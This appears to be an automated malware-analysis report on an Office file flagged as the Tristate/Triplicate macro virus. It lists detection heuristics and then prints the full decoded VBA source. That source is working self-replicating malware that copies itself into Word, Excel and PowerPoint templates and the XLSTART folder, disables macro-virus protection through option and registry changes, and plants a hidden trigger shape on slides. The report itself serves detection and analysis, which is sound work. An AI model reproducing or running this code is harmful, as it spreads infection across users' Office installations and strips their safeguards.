MALICIOUS
320
Risk Score
Heuristics 6
-
ClamAV: Win.Trojan.Tristate-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Tristate-2
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xlApp = CreateObject("Excel.Application") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set WordObj = GetObject(, "Word.Application") -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9805 bytes |
SHA-256: adca8984bc4d9a54eab2dbb9d3cfdefcb3a27175d973fa41102bc02f56386542 |
|||
|
Detection
ClamAV:
Doc.Trojan.Tristate-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Triplicate v0.21 /1nternal
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.DeleteLines 1, AD.CountofLines
AD.InsertLines 1, TT.Lines(1, TT.CountofLines)
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.InsertLines 1, NT.Lines(1, NT.CountofLines)
End If
End If
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
NT.DeleteLines 1, NT.CountofLines
NT.InsertLines 1, AD.Lines(1, AD.CountofLines)
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
End If
xlApp.Quit
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
Set NewMod = Nothing
PBT.Save
End If
PBT.Close
PPObj.Quit
End If
If TT.Lines(1, 1) <> "'<!--1nternal-->" Then
TT.DeleteLines 1, TT.CountofLines
TT.InsertLines 1, NT.Lines(1, NT.CountofLines)
End If
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
WQuit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
WordObj.Options.SaveNormalPrompt = False
NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + TW.Lines(23, 3) + Chr(13) + Chr(10) + TW.Lines(38, 3) + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
NT.DeleteLines 1, NT.CountofLines
NT.InsertLines 1, TW.Lines(1, TW.CountofLines)
Set NT = Nothing
If WQuit = True Then WordObj.Quit
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
Set NewMod = Nothing
PBT.Save
End If
PBT.Close
PPObj.Quit
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
Book1Obj.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Book1Obj.Close
xlApp.Quit
End If
If AW.Lines(1, 1) <> "'<!--1nternal-->" Then
AW.InsertLines 1, TW.Lines(1, TW.CountofLines)
End If
End Sub
Private Sub actionhook(tristate)
On Error Resume Next
If Int(Rnd * 7) = 0 Then
Set Home = ActivePresentation
If UCase(Dir(Application.Path + "\Xlstart\Book1.")) <> UCase("BOOK1") Then
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
WQuit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
WordObj.Options.SaveNormalPrompt = False
NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(23, 3) + Chr(13) + Chr(10) + Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(38, 3) + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
NT.DeleteLines 1, NT.CountofLines
NT.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
NT.ReplaceLine 118, "Private Sub actionhook(tristate)"
Set NT = Nothing
If WQuit = True Then WordObj.Quit
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.ReplaceLine 118, "Private Sub actionhook(tristate)"
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
xlApp.Quit
Set PBT = Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
dontadd = False
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
PBT.Save
End If
PBT.Close
End If
End If
ActivePresentation.SlideShowWindow.View.Next
End Sub
RefreshTable
End Sub
Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.